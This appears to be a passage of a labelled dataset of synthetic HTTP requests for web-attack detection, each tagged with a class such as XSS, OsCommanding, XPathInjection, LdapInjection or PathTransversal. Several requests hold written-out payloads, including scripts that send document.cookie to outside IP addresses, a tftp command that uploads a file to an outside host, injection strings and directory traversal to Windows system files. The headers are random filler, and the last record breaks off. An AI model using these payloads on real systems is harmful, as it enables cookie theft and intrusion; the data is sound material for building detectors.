~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42852
Start - Id: 48245
class: XSS
PUT /umaasraru/3Sm/uso1ea1ixo/autoexecTJJmZTnI2/3mak3rfF1qJiJf4H.ybT.jpeg? HTTP/1.1
Content-Length: 85
Content-Language: c,lylttgt
Content-Encoding: deflate
Content-Location: http://ihEr.fr/mi4syerm.ace
Content-MD5: ZGVvd2gwbm1tTmh0bGxuNg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 11 Mar 06 08:22:28 UTC
Last-Modified: Fri, 05 Jan 07 12:58:56 UTC
Host: 162.2.101.84
Connection: close
Accept: audio/x-wav;q=0.0, application/*
Accept-Charset: euc-tw, iso-8859-9;q=0.9, cp-950;q=0.8, iso-8859-7
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.8
Cache-Control: no-store
Cookie: etGo95vdnno=<style  ><!--</style  ><script   >[window.open('http://134.100.249.189/ntng.asp'+document.cookie);]//--></script >;eta=h;amsidawZeou=4fhS2mas6vnmx5ano;utZeasi=Rnm;3vyGEM=Pnie;s0e=89082
Date: Mon, 07 Sep 09 23:50:47 UTC
ETag: "vKPRrbQWtDJl7Ywr"
Expect: 100-continue
From: id5rnsE@noEEndoae.be
If-Modified-Since: Mon, 07 Mar 05 18:53:15 UTC
If-Unmodified-Since: Mon, 29 Oct 07 03:12:31 UTC
If-Match: *
If-Range: *
Max-Forwards: 2914
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: NTLM c2xhaGxnYmhveGlsbnh0bThsZXJtZXNlUm51Y2R0Y3RydG4=
Referer: /t1nn4e/roen7Eeo/ehteLS5a/es1H0n.jpeg
TE: trailers,trailers
User-Agent: midt2ofn/2.6.8.2.8
UA-CPU: 68000
UA-Disp: 344,654,32
UA-Color: color16
UA-Pixels: 2876x8013
Via: 1.4 www.pSnr.png
Transfer-Encoding: compress
Upgrade: HrI/0.5, e5ene/8.3
Warning: 648 51.206.96.111 "sSooi2nbx5tshecl" 
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

whhiiuateaRis3=i20MNQjobR&dEzase=l2uVoVdi&x0tnnorrenhji=ianxd&xqYR=53138862&aeh=attua

End - Id: 48245
Start - Id: 44617
class: OsCommanding
GET /gnvnotreud/tCeVxKnvy7ZOaHgz/rnhtk/tvthanc/vVUBb7DFTTa/tblr9eIah/dmGkjPzsJ/szcaCahcNZ4Xb/d@LygftRnPFQl9/sgi/nqkjiNwVma_tMrAokrK.jsp?ceqg=%40ti&oandeRlikeGVOK=kke&rn2lo1u5=126.224.92.146+++%7C+++tftp+++++-i+++44.66.61.19+++++PUT+sam._&wphanba=Erbbshd2ummEHf&eyeccymInh=Igert&he=Tevns&ZRWE=o9yCo.W3&ssghilo6n2=1qoasdfrd6&ycsyzh=0ng&or4ELsA_Pha=%3EueddaJTbemcqhe HTTP/1.0
Host: 79.169.115.0:4
Connection: close
Accept: */*;q=0.8
Accept-Charset: x-mac-korean;q=0.2, x-mac-chinesesimp, koi8-r;q=0.2
Accept-Encoding: deflate
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 37.96.14.4
Cookie: 8samUDnxjX6Q=sioNoE/fadeg;eOrmVIX=2760;reils=Aae;GySghgeii=sbZIl;rsrs2t2eHh=a-Ljn@BFwfj2;qb=9
Cookie2: $Version="4"
Date: Wed, 24 Sep 08 01:37:49 GMT
ETag: "B.Ey4sikDhjFiTC"
Expect: 100-continue
From: yrtaag@x3hp5xn5i.net
If-Modified-Since: Sun, 03 Jan 10 10:51:33 UTC
If-Unmodified-Since: Sun, 03 Jun 07 12:32:34 CET
If-Match: ".cVag-ExCXcwA1WT"
If-None-Match: *
If-Range: "uh1EciWmSvjCBYV"
Max-Forwards: 7611
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: ozleh5 vvuEC=0hotw
Authorization: Basic ZWh0ZTpmM2FldQ==
Range: 6245-9,4665-34,-76
Referer: /aOaeania.pl
TE: trailers,trailers
Trailer: Host
User-Agent: 52mai (tJAGFA)
UA-Disp: 0488,6492,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 8439x3607
Via: FTP/9.5 www.amtemD2.tiff, 9.8 178.50.247.110
Transfer-Encoding: compress
Upgrade: eAde/6.1, ueb0oz/9.4, i3ldy/7.4, oibua/9.2, mca3ir/3.2
Warning: 294 www.eeugeo2c.png "bVo5d8oDShGrt1n" 
X-Forwarded-For: 66.99.97.92
X-Serial-Number: 92326230406152
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44617
Start - Id: 35762
class: XPathInjection
GET /idW1nbRA1ef/u1/ix25/dygcUm/wrzSKV2ptJ0YPFSh8Dc/ljwxHkMXr29Z5nc3/lPv5ZXeL6./siaOfegn7soojLi14to/oZXzk76.jsp?9arrqaiehtfst=707949&esohlhnr=7572570384&tcctwsmanr=Dtr%27++++or+ssepsM%2Fdtnrqs%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D23%5D+or+++++%27hO%27+++%3D+%27&catstBTxQVaKVJ=7406&aUDgkIexec1uM=63407606&st1JnntehR=nn9O%3D&qh5srfieu=htaccesmroo HTTP/1.0
Host: www.iowrdpRee.cz
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: er-irsH
Cache-Control: max-age=8
Client-ip: 223.250.208.170
Cookie: U24O=4c;8lcrnfiaId1vfb=bOw2GkcHWm;gbafeayrnera=25;Ocrbebamilni=683675;oioo9smba7sft=6309254;-8Kift=23
Cookie2: $Version="2"
Date: Wed, 30 Sep 09 22:50:07 GMT
ETag: W/"tsvQDtbvV-90U6TPs"
Expect: 100-continue
From: thoeIa@hnsapex3S.gov
If-Modified-Since: Thu, 02 Aug 07 08:53:55 UTC
If-Unmodified-Since: Sun, 18 Mar 07 21:09:12 GMT
If-Match: *
If-None-Match: "v2EW69CIUg3iNHIfe92O"
If-Range: "XQJ_4Fd1TI3VIeCVyS4D"
Max-Forwards: 8492
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: NTLM ZWVzZDhocm40bnJjbnJJdXJhYzR0bmFlZGcyMXI5c3JkRW9leg==
Range: 9042-41
Referer: http://taozod.com/deadetu/sawm.asp
TE: trailers
Trailer: If-None-Match
User-Agent: rUVsH2KYpi http://www.f3anr.fr
UA-CPU: x86
UA-Disp: 8135,7731,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 6100x360
Via: 9.9 www.acuneet.htm, fLue/7.9 122.43.133.37
Transfer-Encoding: identity
Upgrade: inuOi/4.6, b70ue/5.1
Warning: 145 165.132.233.207 "niz6ueo" "Sun, 02 Mar 08 13:20:23 UTC"
X-Forwarded-For: 142.75.180.148
X-Serial-Number: 040193563593
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35762
Start - Id: 38726
class: LdapInjection
GET /or/iJ8JKLZ2/ia3y/hoD/W@v_fRw_K16JXor/eLiafP./fla8se.nsf?vAstase=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&0nauveleqej=8164942&q8attenazj4=%5Bae+tar%28d-9u&eknzb=10786&nhoherihetrduOh=k&tblnMedlhoaowtr=52&hEoueetTTgd2=b6h HTTP/1.1
Host: 199.147.72.237
Connection: keep-alive
Accept: text/*;q=0.3, text/html
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: lueaNoN-tWdrf2;q=0.1, e-er, frged-trp5;q=0.5
Cache-Control: max-age=52081
Client-ip: 132.36.253.148
Cookie: 4a7n=oenneaAnhNi ;2hyrc=idseeztir0Hwzo7n2;c8Xsm=s-gb613ALsPE;swvc4fepeR=826927731
Cookie2: $Version="15"
Date: Sun, 12 Mar 06 21:40:19 CET
ETag: "QB_Ra65Zn9G0M2Xodqta"
Expect: 100-continue
From: ilrb@h5ihiwr.cz
If-Modified-Since: Tue, 06 Nov 07 15:34:13 GMT
If-Unmodified-Since: Sun, 22 Feb 04 18:08:18 GMT
If-Match: "AEFRn_BfxVQKRWtDbZI"
If-None-Match: *
If-Range: "zPR6Mgx2wjwXWv5Qm1k"
Max-Forwards: 0509
MIME-Version: 7.8
Pragma: ggn='wI3hn'
Proxy-Authorization: ztgn ZDrc=dnonaeea
Authorization: NTLM dGNucnJ1NG5scmkzZG5uSGF0bnRldHJBbzh6ZFJkc3llYm1lZXQydw==
Range: 5873-
Referer: /bLa8/mhiram/sthao/9tfuhwto/arecs7.js
TE: gzip
Trailer: Authorization
User-Agent: Mozilla/9.0 (X11; U; Linux i386 9.2; hd-o8; rv:7.5.4) Gecko/43470432
UA-CPU: 68000
UA-Disp: 281,271,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 094x3377
Via: 7.3 79.47.162.18
Transfer-Encoding: uaCph; iteo=aad8uls
Upgrade: u3thye/4.0, rfee/2.0
Warning: 792 57.164.145.223:2 "o6u6iwaenei" "Thu, 08 Oct 09 12:11:05 UTC"
X-Forwarded-For: 18.156.103.46
X-Serial-Number: 9623929231102541255
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38726
Start - Id: 38198
class: LdapInjection
GET /Z_FFg7cmd1/deeCntjtbeue/Siiwod/ftpZu7optO990GAmL/tC0/5uhomueoedd/eaeYuNrh5ogoaorn/nRFEah01J77GuET/pE/ycrezsM4ket/jYi/eaOsfueiuidaI6gi5ii.htm?whereFNpJEPsL=20&awietap=%29%28++++%7C%28displayName%3Dhad*%29%28name++%3Dhad*+%29%28+++mail%3Dhad*+%29 HTTP/1.0
Host: 169.178.183.217
Connection: close
Accept: text/plain, application/*, text/html
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 8y-rspnteea, bpj-44, shgxtrua-e3nvStb
Cache-Control: min-fresh=24060
Client-ip: 9.211.101.123
Cookie: sCv@-9YjRM-=i6henpeelahNoarac;ih=303
Cookie2: $Version="056"
Date: Fri, 17 Feb 06 19:17:08 UTC
ETag: W/"JiAtFW0tg5S.p1q"
Expect: 100-continue
From: hnrpa@Dtsdlni.be
If-Modified-Since: Sun, 04 Apr 10 04:07:20 GMT
If-Unmodified-Since: Tue, 24 Jun 08 19:47:23 CET
If-Match: "Gq947FVIKEpTIdISdE6V"
If-None-Match: "JMxoNj_owNG5dq-IhQmC"
If-Range: Tue, 31 May 05 23:12:01 GMT
Max-Forwards: 057
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: tnEjr B7bt5=zaeTe
Authorization: hmtuel fet4=hcsyo
Range: -625791,-192
Referer: /h4tabt/o9en/etakW/stVie.php3
TE: deflate;q=0.0,trailers,deflate;q=0.4
Trailer: Accept-Language
User-Agent: Mozilla/1.5 (Machintosh; U; PPC Mac OS X 9.4; iv-eu; rv:0.4.0) Gecko/34322428
UA-CPU: StrongARM
UA-Disp: 843,585,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 8072x4973
Via: iPcjar/7.0 www.xigd.png
Transfer-Encoding: deflate
Upgrade: mrrUlT/4.8, 7edu/8.3
Warning: 995 www.tstihc.htm "sL1halusfi" 
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 65007245456337542415
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38198
Start - Id: 45578
class: PathTransversal
GET /q59WtXZjRl9aJIF8Z/uhgheolT/g1/BO2/e6h.LAE/gggratefnbsi.jpeg?uhdrntpmtu=hue7K&ge=35519&wli5=7+E&VtmpobjectPJv8connectxml=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Ftaolretaor%2Fisertoer%2Fte%2Flenensst.pl&doeLtllcuth=64ont&tpstrewetesCtr=bdtoEehMeale&eet1uteeAdstra=2520&betweeneyi=PlcrZechorsaiesxp_8e&.maMsYJ=04s&tluileufs=677279074&vRPpsen=rXpf%40ds&z6N0b5hste=oqto8o%25&rr3ldmolt=6t+4zeynfstyle HTTP/1.0
Host: 233.63.103.205
Connection: close
Accept: audio/*;q=0.8, video/quicktime
Accept-Charset: *
Accept-Encoding: 
Accept-Language: nw-fmCthu6n, nu-w;q=0.1, grpl0sia-nevhep
Cache-Control: no-transform
Client-ip: 217.136.109.210
Cookie: rnryest5s=c2(b$ tt ai0ai0ir O;luemoom4=Woetan
Cookie2: $Version="606"
Date: Thu, 18 Aug 05 19:58:13 UTC
ETag: "7BJnOXhoOC90uhha"
Expect: roaemt
From: wtdlbok@elsFbheed.st
If-Modified-Since: Fri, 23 Apr 10 17:37:28 CET
If-Unmodified-Since: Wed, 07 Mar 07 07:53:51 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1633
MIME-Version: 2.5
Pragma: DQ='ueiti'
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: Basic dENnZ2FuOlNsQWlvczFy
Range: 286-378831
Referer: http://www.tlriE.org/7tzceet/thb0s/hS1eei/o6Use9/teorfb7p.asmx
TE: chunked,gzip,trailers
Trailer: Upgrade
User-Agent: rIESWs. http://www.kiaVrsoT.com
UA-CPU: StrongARM
UA-Disp: 6548,353,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6460x166
Via: 0.6 230.210.43.29, HTTP/1.0 www.rssichs.htm
Transfer-Encoding: deflate
Upgrade: m9e/5.3, eSsw5l/3.4, Vct7rc/0.1, hEwtE/6.8
Warning: 987 134.153.100.236 "eesinenge5NOla6sS" 
X-Forwarded-For: 58.229.7.205
X-Serial-Number: 368281150283459
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45578
Start - Id: 37047
class: LdapInjection
GET /evr/igDhxfqVKE-j.wuS/imiTdedea.jpeg?RMmASpCF=xHnen2rspOes&7ri=hjrldeJaz2&rosotET=t4v&duv=C%5Do6R&4da8Wr=brtiO4fowdo&4ueanitw=qFXye.hwUF&nsthotrxonh=00Ylsame%40ydiernh&linsbyxereey=%29%28++++%7C%28yq%3Dfa*%29&gqM2t4edA6yw=dA6 HTTP/1.1
Host: 100.0.43.134
Connection: e7aiad9e
Accept: */*
Accept-Charset: shift_jis;q=0.8, windows-1252;q=0.2, x-mac-greek, iso-8859-7
Accept-Encoding: identity;q=0.4
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 104.169.128.248
Cookie: stdLdeoovA=27ySwu;aaldnl=<3eoH<aa8N&
Cookie2: $Version="4"
Date: Tue, 20 Feb 07 01:55:54 CET
ETag: "pCx4hdVFNF.DM1COX"
Expect: mly5a=blmtutlt
From: ibiyuSf@istTee.cz
If-Modified-Since: Tue, 05 Oct 04 14:04:18 UTC
If-Unmodified-Since: Sun, 19 Oct 08 02:05:18 UTC
If-Match: *
If-None-Match: "jfyHLU6IO4Nk2Rqe"
If-Range: "nFLIjUeH7XGYUQ1pvTi"
Max-Forwards: 4060
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Digest opaque="isetlaxp"
Authorization: Basic ZHR0THRsOnIxeTNlcg==
Range: 5-21,-51,0162-
Referer: /66idh6/ujMeHfed.php3
TE: gzip;q=0.5,deflate;q=0.4,trailers
Trailer: If-Modified-Since
User-Agent: eIa9Dsg http://www.adSHnioa.it
UA-CPU: 68000
UA-Disp: 370,042,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9902x0663
Via: 9.8 34.146.181.145
Transfer-Encoding: gzip
Upgrade: nopuat/4.5
Warning: 055 85.124.104.165 "iraNbtdtn5hudtyn" 
X-Forwarded-For: 143.102.250.73
X-Serial-Number: 595061014884085769
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37047
Start - Id: 49335
class: XPathInjection
GET /ahiqitn5eflaoSh/fpaogthselIoe1m/Dge/fhnY4lSyTT/rphe7ecgiIUc/utidltuagnyT8o/5-nQvIPd1X/aafapimjsetTxyd/4teEctFugia4ne/lysbtrnqneer9oso/eE5imQaz7hmB1x3vS.gif?8ndbaloeboeBs=OEguOrnnuh5umnelhi&ohyd=%3F%25Iey6thedntet&etcjuposition7@mm=18&joeulsm=mrcpee%7Edor0a&ylxd6iIxpsai=%28i++++%3C+++++count%28sga1%2Fchild%3A%3Atext%28%29%29++++and+j+++++%3C+++++count%28Ir%2Fchild%3A%3Acomment%28%29%29++and+k++%3C++++count%28et%2Fchild%3A%3A*%29++++%29&jrsy=enrcp-sieerm+mi%5Ce+&oBmep2rqhd=om%5Drn+ HTTP/1.0
Host: www.rnnjee.de
Connection: keep-alive
Accept: application/rtf
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=41671
Client-ip: 23.148.126.23
Cookie: 3jrr=netcatNanp=m9o;annPheeOgrtaS=0;I2motmed0whxe=2978958476;RAnDz=ro;4gQt=iEdrhc;v8tL_9hPTOb0=wotaO
Cookie2: $Version="889"
Date: Mon, 16 Aug 04 07:16:50 GMT
ETag: W/"FV.LajZ9oyTbHsHCIym"
Expect: nlurIti
From: 5sny@toesr.uk
If-Modified-Since: Mon, 08 Sep 08 24:30:08 GMT
If-Unmodified-Since: Sun, 10 Jul 05 04:00:03 UTC
If-Match: "F_UbHJV_DEwBike_"
If-None-Match: "2sXxYV.Ic6rbmYH_"
If-Range: "eY3sf-2Y.5AmHnm"
Max-Forwards: 48
MIME-Version: 6.3
Pragma: aeo9ae8=apectph
Proxy-Authorization: Basic NGVuYVRlOmlkRTY=
Authorization: Basic c29pZTplbHRxcmVN
Range: -8
Referer: http://www.hsoa.ch/ua4l6/64etrIo/kevlaet.php4
TE: trailers,gzip
Trailer: From
User-Agent: Mozilla/3.2 (compatible; Konqueror/7.1; Mac OS X; e8teoy9e)
UA-CPU: StrongARM
UA-Disp: 396,9946,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 953x2070
Via: HTTP/2.2 www.beewh.jpeg:6574, HTTP/1.3 www.so3uh.jpeg
Transfer-Encoding: compress
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 906 www.mgsdP.jpg "luEthgfredan" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 27114318414424
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49335
Start - Id: 50042
class: XPathInjection
PUT /6rroaaePwco2T6/sznJ.vOgdGqJ.php? HTTP/1.1
Content-Length: 141
Content-Encoding: gzip
Content-Location: http://www.rtrp.st/n0ar/dohEnete/atlen1p/lrLPA.jpeg
Content-MD5: b3Q3ZXJpY21mcnB1ODZlRQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 15 Jul 05 06:24:45 CET
Host: www.szect.uk
Connection: close
Accept: */*;q=0.2
Accept-Encoding: 26719     or    ttrLi/rre/Ar/child::node()[position()=68] or 69346=
Accept-Language: *;q=0.3
Cache-Control: eibl='rlpy'
If-Modified-Since: Sat, 15 Sep 07 12:18:36 GMT
If-Range: Fri, 06 Apr 07 10:12:49 UTC
Pragma: h='ie2saocm'
Authorization: Digest qop=auth
Referer: /Muser32/oaan/dnohl2.exe
User-Agent: 7ejHeernn (imNO69l11; emm9zBDF7; lnec.envM; yw@RNugo; oZRNmS)
Warning: 251 www.iarwnzwd.shtml "ewoniilrirr" "Tue, 21 Nov 06 23:24:06 UTC"
----: -------------------------------------

e3etI=cft&ruvfcka=50893670&rg6wasfmi=59238050&ehm5nEno=705&hc3teko2l=850449&arRunft1fid=pu5iMOX4x61&Ca_hJ-dsbd=882377215&se0lcpiO1aUgdi=57349

End - Id: 50042
Start - Id: 47445
class: XSS
GET /39/e6/tAphrrdoesmorSo7jk/isd7iosi8eeao/olqd9LneOT/J576img@bsWzu@/gIjG@BBFsJPG-C/d@Z/hQkTLxdIJ02L-FJy@F/sj3.shtml?t0sioeuce2aai=30593844&zouU8ichT5e=%3Cstyle++++%3E%3C%21--%3C%2Fstyle+++%3E%3Cscript+++%3E%5Bwindow.open%28%27http%3A%2F%2F210.69.1.154%2Fgeenra.mspx%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript++%3E&eu=168&qu=772 HTTP/1.0
Host: 166.108.76.134
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: us-ascii, windows-1253;q=0.0, x-mac-arabic;q=0.7, windows-1250;q=0.4
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: no-transform
Client-ip: 125.166.89.173
Cookie: iesuil8hr=autoexecnode;owadaiibLmc1xb=rrjIG@;in=ejnwbgtnddsDmtdj;group by7o6hIoGlsX=ga5enetkowe2;negoihfuS=86772
Cookie2: $Version="79"
Date: Fri, 23 Feb 07 17:13:00 GMT
ETag: "xMu08ozzBwiL@pSdUkT"
Expect: emr8ts
From: eskhrz@f8eyrrtmw.biz
If-Modified-Since: Sun, 08 May 05 10:12:04 UTC
If-Unmodified-Since: Tue, 10 Feb 09 14:23:35 GMT
If-Match: "mpKmDbfgvw6V4BN6t1"
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest username="rtiKrm"
Range: 13744-31405
Referer: http://udig.de/usyeteic/eitrn/h3ii.aspx
TE: deflate;q=0.2,deflate
Trailer: If-Range
User-Agent: Mozilla/7.8 (compatible; konaiaq; Win98; tfvtz)
UA-CPU: MIPS
UA-Disp: 1377,371,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 644x740
Via: FTP/6.7 www.6bfa.css, HTTP/3.3 103.97.47.204, HTTP/6.0 223.245.230.35:8
Transfer-Encoding: compress
Upgrade: tah/4.0, bipq/1.5, o5rz/9.5
Warning: 281 www.x8r0s.tiff "js1edtagecg" "Sat, 28 Jul 07 11:01:34 UTC"
X-Forwarded-For: 217.98.75.84
X-Serial-Number: 226091720709125
----: --------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 47445
Start - Id: 48697
class: XPathInjection
POST /kg@p0Of2aaLL7@e9/l3Qnbgsoundv/N91-LDIrxN0k/3Izuvt0lTb.css? HTTP/1.0
Content-Length: 387
Content-Language: gata7ris
Content-Encoding: identity
Content-Location: http://gfhuej.fr/utlh/oeotere/naoa/aaEsh/rebhos1.dll
Content-MD5: dHBzdGl1YnJlb2RzdGRuaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 29 Mar 10 10:09:36 CET
Last-Modified: Sat, 10 Jan 09 12:23:06 GMT
Host: www.ewbeoaer.uk
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: iso-8859-8-i;q=0.8, macintosh, windows-1251;q=0.7, iso-8859-8-i
Accept-Encoding: identity;q=0.9, compress;q=0.3, identity;q=0.3, compress, gzip;q=0.6
Accept-Language: *
Cache-Control: no-transform
Client-ip: 159.42.128.3
Cookie: huuae=bosexect;cat7rVha4=taem t6 T3;@Wx0c=~6techoleisucst0insertrIhttpsalr;Eorr= ie tshobhcV
Cookie2: $Version="87"
Date: Tue, 05 Oct 04 23:07:23 GMT
ETag: "iRPx-vhsrn5IOB4F@6ra"
Expect: oiaydiik=Cesre;ani7=heeoad
From: i1istd@23tm.net
If-Modified-Since: Mon, 02 May 05 23:06:15 UTC
If-Unmodified-Since: Mon, 05 Jan 04 13:43:02 CET
If-Match: *
If-None-Match: "VECQx-Ft5wtKwPh"
If-Range: *
Max-Forwards: 4233
MIME-Version: 7.4
Pragma: e='ieeT'
Proxy-Authorization: Basic bXNlczlyaDpudHNo
Authorization: Basic SXR2dTp1bkljZGE=
Range: 569156-2482
Referer: /9e8G/atier/6nrE/BloAm/aRntm.conf
TE: trailers,deflate;q=0.3
Trailer: Expect
User-Agent: Mozilla/4.0 (Machintosh; U; PPC 7.1; ww-tj; rv:2.7.2) Gecko/81058854
UA-CPU: MIPS
UA-Disp: 527,267,32
UA-Color: color8
UA-Pixels: 640x9904
Via: 5.2 96.130.108.219, 4.0 230.93.196.168:3142, fT9/2.1 www.tuyssr.htm
Transfer-Encoding: compress
Upgrade: 4mtfwe/7.8, Nuhsbd/2.0, ozoe1/6.1, oePeo/8.5, ats/0.5
Warning: 956 www.8Oqk.shtml:3 "dhfeiV6ltr" 
X-Forwarded-For: 243.139.91.251
X-Serial-Number: 3185085450816900238
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

IVGfDEy_hP=t=htsNizoeaGyr&42MDMWSZ8oH=eNWK@LI3&NwiBre=e a&eobotatumv=5  or     1< ikNIee/8sas6/lnnat/child::text()[position()=382]   or  9813='] | /* | /foo[bar='&oks85nt8wiqur=tomg&ceeir4Nts=98260742&TkowyZ=9034&ngo96wbopbnsbo=ctananrlecdcsh&omUthsrdyEmduu=v&jor Sg3ohn&edteveo8eii=s@&cietreeaAr=vkayoaeTwp-wusrcnhtpassn&toatsiwco=u

End - Id: 48697
Start - Id: 45721
class: PathTransversal
GET /7ZTl.m-9c25Eri1/uFF@9V.php4?sw66awuezio=027&scriptUKLb=i0ye&ehaepalA=0%3B&cr8ec=dtOLeut&prmbe=hfKciEV&FfcmdT=xnao&8aogn=6&enhenom=+Or%3D&twqa=..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&phLrnpcyh8Op=pxrv&uneeelaAt2ibdlr=enandvoSdiveata%3CNqEirl&c4SsySuslborbd=zrja4pslrr&YLp.b7Cbar=85&nERB22M3K8imgk=8hfk&3lTnaoiotfH=a%29+aE HTTP/1.0
Host: 71.75.39.195
Connection: close
Accept: */*
Accept-Charset: x-mac-cyrillic;q=0.3
Accept-Encoding: gzip;q=0.0, identity;q=0.8, compress, deflate
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 213.38.176.90
Cookie: hyie1eo8leaOepu=612368;.6Vp1rSP4itH=epi\koouth
Cookie2: $Version="66"
Date: Fri, 08 Oct 04 11:51:17 GMT
ETag: W/"1HDzOZzjJta_eti"
Expect: E8io1m=9m68xA;ctn5kTae=znnvtbd
From: reani1tb@daeireeubl.de
If-Modified-Since: Fri, 16 Jul 04 06:14:09 CET
If-Unmodified-Since: Sun, 29 Jan 06 21:04:03 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 29 May 04 22:57:34 GMT
Max-Forwards: 1148
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Digest response="3Af90CBDBAA22CFCA9Ee330CF911aFf9"
Authorization: NTLM bXNZTWU2c2Rkc3J1bW1zb3RoZW9tbGV4Y3FlSDVhb2FzZmhzcmE=
Range: -500252,934-3694
Referer: http://www.crlegho.fr/uxitf.asmx
TE: gzip,trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/2.0 (Machintosh; U; Mac OS X 2.8; lk-tr; rv:2.4.8) Gecko/44104232
UA-CPU: Sparc
UA-Disp: 664,891,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 967x7308
Via: FTP/5.1 www.IEbcnloh.tiff, 3.7 www.s6di.jpeg, 8.6 33.206.197.118
Transfer-Encoding: deflate
Upgrade: sz3/7.1, 6Dnd/4.3
Warning: 139 123.133.191.85 "aoRovfiyaetlwhiotHa" "Tue, 27 Apr 10 21:16:33 GMT"
X-Forwarded-For: 159.195.9.102
X-Serial-Number: 1618317
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 45721
Start - Id: 48082
class: XSS
GET /tM3/imkep7/anRtaidsrh/e0HDx9Cz@jRkdT/Koi/tbhgSGr0RxLQW/g7reSKfo8MiE6drI3YuJ/iqgiiliqh/a0P/m_aQ7nALH/p7n_Xm@KU5o19@Npb/m5arawhgceqrRwdqhP.bin?WdJ@RY5allX=%3Cxml++++id%3D+%22+++X+%22++%3E%3Ca++%3E%3Cb++++%3E%26lt%3Bscript++%3E%5Bwindow.open%28%27http%3A%2F%2F209.253.136.251%2Fiell.nsf%27%2Bdocument.cookie%29%3B%5D%26lt%3B%2Fscript++%3E%3B%3C%2Fb+%3E%3C%2Fa++%3E%3C%2Fxml+++%3E HTTP/1.0
Host: 192.33.11.155
Connection: keep-alive
Accept: image/*;q=0.8, video/quicktime;q=0.0, video/*;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: gImh-kiny;q=0.9, nuasaei-e, uiz0-iD1rooI;q=0.2, s-nrn, ight-or
Cache-Control: min-fresh=358
Client-ip: 220.26.106.26
Cookie: m0=1s ;V1wDS=sAeooszs;oleoersnra=wnqo5s3lu
Cookie2: $Version="5"
Date: Fri, 25 Jun 04 09:26:57 UTC
ETag: W/"d7O@30CYQD7MNCaw"
Expect: 100-continue
From: pr43lq@7remye.cz
If-Modified-Since: Sat, 12 Jul 08 18:49:49 CET
If-Unmodified-Since: Sat, 07 Jul 07 10:37:52 CET
If-Match: "78vwAGbDNFfLif_UkWJ"
If-None-Match: "fuoh7eEbTW7LhPidu"
If-Range: *
Max-Forwards: 7966
MIME-Version: 2.8
Pragma: aEa2inQh='m6lhiTte'
Proxy-Authorization: NTLM ZXR0eWNlYWNlcmNHZ2dsZU95ZWJpcnNobk93aDZ6aThldGZudG4=
Authorization: Rucfn yksNds=e8tWg
Range: -179295,540225-63
Referer: http://www.e2Ts.be/ait3/teean/Aebo/tttthier/mnml.nsf
TE: trailers
Trailer: Max-Forwards
